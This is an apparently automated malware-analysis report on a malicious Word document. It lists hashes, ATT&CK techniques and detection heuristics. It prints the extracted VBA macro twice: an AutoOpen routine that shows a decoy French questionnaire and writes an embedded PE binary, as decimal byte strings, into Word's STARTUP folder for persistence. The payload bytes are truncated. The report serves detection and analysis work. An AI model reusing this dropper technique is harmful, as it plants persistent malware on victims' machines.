Office (OLE) malware analysis — malicious · ea50f6dd4d75e1a6

MALICIOUS

Office (OLE)

435.5 KB Created: 2017-10-31 17:11:00 First seen: 2017-11-13

MD5: 18abb457e088b6658a4b4f53375137c3 SHA-1: 6941b273c6f53fbe9da2862d33f47c12911db0c1 SHA-256: ea50f6dd4d75e1a6c5c85121a9c21b9bfd535a4eb9b0ca5786a5a7b12d065d44

170 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1037.001 Boot or Logon Initialization: Script Based

The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening a document. The script prompts the user for personal information using InputBox and MsgBox functions, and then attempts to write a file named 'WinWord-plgx64.wll' to the user's application data directory. The presence of CreateObject and Environ() calls, along with the auto-execution marker, strongly suggests malicious intent, likely to download and execute a second-stage payload or establish persistence.

Heuristics 7

VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 232368 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	232368 bytes
SHA-256: `1ccb2de84a5c1ad2bca99efce0e93de96b399483be60db7edc7331971bfe9709`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim Info Main Info = InputBox("Nom, prénom :", "Identité", "DUPONT Marie") DoIt End Sub Private Sub Main() MsgBox "Nous vous remercions pour votre participation, ce questionnaire ne prendra que quelques instants." End Sub Attribute VB_Name = "Module1" Sub DoIt() Dim strFile Dim Info Dim app MsgBox ("Ces informations sont indispensables au bon développement.") app = Environ("appdata") strFile = app + "\Microsoft\Word\STARTUP\WinWord-plgx64.wll" DumpFile strFile End Sub Sub WriteBytes(objFile, strBytes) Dim aNumbers Dim iIter aNumbers = Split(strBytes) For iIter = LBound(aNumbers) To UBound(aNumbers) objFile.Write Chr(aNumbers(iIter)) Next End Sub Sub DumpFile1(objFile) WriteBytes objFile, "77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0" WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 248 0 0 0 14 31 186 14 0 180 9 205" WriteBytes objFile, "33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111" WriteBytes objFile, "116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10" WriteBytes objFile, "36 0 0 0 0 0 0 0 52 159 243 187 112 254 157 232 112 254 157 232 112 254 157 232 129" WriteBytes objFile, "56 82 232 98 254 157 232 129 56 80 232 122 254 157 232 129 56 83 232 38 254 157 232" WriteBytes objFile, "112 254 156 232 62 254 157 232 140 137 36 232 115 254 157 232 83 17 78 232 115 254" WriteBytes objFile, "157 232 22 16 87 232 113 254 157 232 22 16 84 232 113 254 157 232 22 16 81 232 113" WriteBytes objFile, "254 157 232 82 105 99 104 112 254 157 232 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0" WriteBytes objFile, "0 0 0 0 80 69 0 0 76 1 5 0 17 171 248 89 0 0 0 0 0 0 0 0 224 0 2 33 11 1 11 0 0 100" WriteBytes objFile, "0 0 0 158 0 0 0 0 0 0 35 18 0 0 0 16 0 0 0 128 0 0 0 0 0 16 0 16 0 0 0 2 0 0 6 0 0" WriteBytes objFile, "0 0 0 0 0 6 0 0 0 0 0 0 0 0 64 1 0 0 4 0 0 0 0 0 0 2 0 64 1 0 0 16 0 0 16 0 0 0 0" WriteBytes objFile, "16 0 0 16 0 0 0 0 0 0 16 0 0 0 240 201 0 0 234 0 0 0 4 196 0 0 40 0 0 0 0 0 1 0 224" WriteBytes objFile, "1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 16 1 0 124 11 0 0 64 129 0 0 56 0 0 0 0 0" WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 104 192 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0" WriteBytes objFile, "128 0 0 4 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 46 116 101 120 116" WriteBytes objFile, "0 0 0 64 99 0 0 0 16 0 0 0 100 0 0 0 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 96 46 114" WriteBytes objFile, "100 97 116 97 0 0 218 74 0 0 0 128 0 0 0 76 0 0 0 104 0 0 0 0 0 0 0 0 0 0 0 0 0 0" WriteBytes objFile, "64 0 0 64 46 100 97 116 97 0 0 0 20 44 0 0 0 208 0 0 0 14 0 0 0 180 0 0 0 0 0 0 0" WriteBytes objFile, "0 0 0 0 0 0 0 64 0 0 192 46 114 115 114 99 0 0 0 224 1 0 0 0 0 1 0 0 2 0 0 0 194 0" WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 114 101 108 111 99 0 0 10 33 0 0 0 16 1 0 0" WriteBytes objFile, "34 0 0 0 196 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 66 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0" WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0" WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0" WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0" WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0" WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0" WriteBytes objFile, "0 0 0 0 ... (truncated)

SHA-256: 1ccb2de84a5c1ad2bca99efce0e93de96b399483be60db7edc7331971bfe9709

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
    Dim Info
    Main
    Info = InputBox("Nom, prénom :", "Identité", "DUPONT Marie")
    DoIt
End Sub


Private Sub Main()
    MsgBox "Nous vous remercions pour votre participation, ce questionnaire ne prendra que quelques instants."
End Sub


Attribute VB_Name = "Module1"
Sub DoIt()
    Dim strFile
    Dim Info
    Dim app
    MsgBox ("Ces informations sont indispensables au bon développement.")
    app = Environ("appdata")
    strFile = app + "\Microsoft\Word\STARTUP\WinWord-plgx64.wll"
    DumpFile strFile
End Sub


Sub WriteBytes(objFile, strBytes)
    Dim aNumbers
    Dim iIter

    aNumbers = Split(strBytes)
    For iIter = LBound(aNumbers) To UBound(aNumbers)
        objFile.Write Chr(aNumbers(iIter))
    Next
End Sub

Sub DumpFile1(objFile)
    WriteBytes objFile, "77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0"
    WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 248 0 0 0 14 31 186 14 0 180 9 205"
    WriteBytes objFile, "33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111"
    WriteBytes objFile, "116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10"
    WriteBytes objFile, "36 0 0 0 0 0 0 0 52 159 243 187 112 254 157 232 112 254 157 232 112 254 157 232 129"
    WriteBytes objFile, "56 82 232 98 254 157 232 129 56 80 232 122 254 157 232 129 56 83 232 38 254 157 232"
    WriteBytes objFile, "112 254 156 232 62 254 157 232 140 137 36 232 115 254 157 232 83 17 78 232 115 254"
    WriteBytes objFile, "157 232 22 16 87 232 113 254 157 232 22 16 84 232 113 254 157 232 22 16 81 232 113"
    WriteBytes objFile, "254 157 232 82 105 99 104 112 254 157 232 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
    WriteBytes objFile, "0 0 0 0 80 69 0 0 76 1 5 0 17 171 248 89 0 0 0 0 0 0 0 0 224 0 2 33 11 1 11 0 0 100"
    WriteBytes objFile, "0 0 0 158 0 0 0 0 0 0 35 18 0 0 0 16 0 0 0 128 0 0 0 0 0 16 0 16 0 0 0 2 0 0 6 0 0"
    WriteBytes objFile, "0 0 0 0 0 6 0 0 0 0 0 0 0 0 64 1 0 0 4 0 0 0 0 0 0 2 0 64 1 0 0 16 0 0 16 0 0 0 0"
    WriteBytes objFile, "16 0 0 16 0 0 0 0 0 0 16 0 0 0 240 201 0 0 234 0 0 0 4 196 0 0 40 0 0 0 0 0 1 0 224"
    WriteBytes objFile, "1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 16 1 0 124 11 0 0 64 129 0 0 56 0 0 0 0 0"
    WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 104 192 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0"
    WriteBytes objFile, "128 0 0 4 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 46 116 101 120 116"
    WriteBytes objFile, "0 0 0 64 99 0 0 0 16 0 0 0 100 0 0 0 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 96 46 114"
    WriteBytes objFile, "100 97 116 97 0 0 218 74 0 0 0 128 0 0 0 76 0 0 0 104 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
    WriteBytes objFile, "64 0 0 64 46 100 97 116 97 0 0 0 20 44 0 0 0 208 0 0 0 14 0 0 0 180 0 0 0 0 0 0 0"
    WriteBytes objFile, "0 0 0 0 0 0 0 64 0 0 192 46 114 115 114 99 0 0 0 224 1 0 0 0 0 1 0 0 2 0 0 0 194 0"
    WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 114 101 108 111 99 0 0 10 33 0 0 0 16 1 0 0"
    WriteBytes objFile, "34 0 0 0 196 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 66 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
    WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
    WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
    WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
    WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
    WriteBytes objFile, "0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
    WriteBytes objFile, "0 0 0 0 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.